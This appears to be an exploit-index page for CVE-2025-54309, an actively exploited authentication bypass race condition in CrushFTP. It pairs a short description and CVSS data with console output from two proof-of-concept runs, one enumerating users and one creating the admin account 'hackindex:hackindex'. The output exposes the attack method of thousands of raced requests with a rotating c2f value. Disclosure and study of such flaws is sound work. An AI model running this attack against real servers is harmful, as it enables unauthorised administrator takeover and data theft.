CVE-2025-54309:
CrushFTP
CVE-2025-54309 is a CrushFTP web-interface flaw disclosed in July 2025 that was actively exploited in the wild. It happens because CrushFTP mishandles AS2 validation (notably when the DMZ proxy feature isn’t used), letting an unauthenticated attacker hit the server over HTTPS and end up with administrator access. Once they have admin, they can effectively take over the file-transfer server (create/modify accounts, access data, change configuration, and potentially chain it into full compromise).
[*] Generated new c2f value: Z4N5
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-CrushFTP-CVE-2025-54309.py
(*) CrushFTP Authentication Bypass Race Condition PoC
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-54309]
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://$TARGET
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: o56w
[*] NEW SESSION: c2f=o56w
[*] EXFILTRATED 4 USERS: test, crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!
╔═══════════════════════════════════════════════════════════╗ ║ CrushFTP CVE-2025-54309 Exploit ║ ║ Race Condition Authentication Bypass ║ ║ User Creation Version ║ ║ ║ ║ FOR AUTHORIZED TESTING ONLY ║ ║ HTB Labs & Pentesting Use ║ ╚═══════════════════════════════════════════════════════════╝ [*] Target: http://$TARGET [*] New admin user: hackindex:hackindex [*] CRUSHFTP USER CREATION EXPLOIT [*] TARGET: http://$TARGET [*] CREATING USER: hackindex:hackindex [*] ATTACK: 5000 requests with new c2f every 50 requests ============================================================ [*] Generated new c2f value: 4Prl [*] Starting race with 5000 request pairs... ============================================================ [*] Generated new c2f value: 2JEx [*] NEW SESSION: c2f=2JEx [+] SUCCESS! User 'hackindex' created successfully! [+] Response indicates user creation was successful [+] USER CREATION SUCCESSFUL! [+] EXPLOITATION COMPLETE! [+] Admin user created: hackindex:hackindex [+] Try logging in at: http://$TARGET/WebInterface/ [+] Or access the admin interface directly
9
Critical risk
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Compexity
high
Privileges
none
Affected
>10, < 10.8.5 && >11, < 11.3.4_23